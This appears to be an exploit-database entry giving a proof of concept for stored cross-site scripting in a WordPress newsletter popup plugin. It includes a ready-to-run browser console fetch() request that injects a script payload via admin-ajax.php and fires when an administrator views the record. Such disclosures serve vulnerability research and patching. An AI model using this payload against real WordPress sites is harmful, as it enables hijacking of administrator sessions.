## https://sploitus.com/exploit?id=WPEX-ID:FED1E184-FF56-44FE-9876-D17C0156447A
1. Create a Newsletter popup (any will do) and publish it.
2. Use an incognito window and open the website involved, then run the following code in the browser console (change URL accordingly): fetch('http://localhost/wp-admin/admin-ajax.php', { method: 'POST', headers: new Headers({ 'Content-Type': 'application/x-www-form-urlencoded', }), body: 'action=savenewsletter&nlid=1&nlname=Test&nldata=EMAIL%3Dalert(1)' }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));
3. Go to the WP-Admin dashboard, and Newsletter Popup -> Local Record, click on Show Record.
4. The alert will trigger successfully.